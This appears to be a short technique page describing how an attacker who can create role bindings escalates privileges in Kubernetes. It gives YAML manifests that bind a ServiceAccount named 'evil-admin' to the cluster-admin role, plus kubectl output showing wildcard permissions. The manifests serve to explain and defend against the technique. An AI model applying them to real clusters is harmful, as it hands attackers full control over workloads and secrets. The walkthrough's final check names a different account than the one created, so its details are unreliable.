Role-based access control (RBAC) is a key security feature in Kubernetes. RBAC can restrict the allowed actions of the various identities in the cluster. Cluster-admin is a built-in high privileged role in Kubernetes. Attackers who have permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles.
Create a new ServiceAccount evil-admin
.
apiVersion: v1
kind: ServiceAccount
metadata:
name: evil-admin
namespace: default
Create a new RoleBinding (or ClusterRoleBinding) that binds our evil-admin
ServiceAccount to the cluster-admin
role.
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: evil-admin-binding
namespace: default
subjects:
- kind: ServiceAccount
name: evil-admin
namespace: default
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
We now have full control over the default
namespace.
$ kubectl auth can-i -n default --list --as system:serviceaccount:default:evil-cluster-admin
Resources Non-Resource URLs Resource Names Verbs
*.* [] [] [*]
[*] [] [*]
...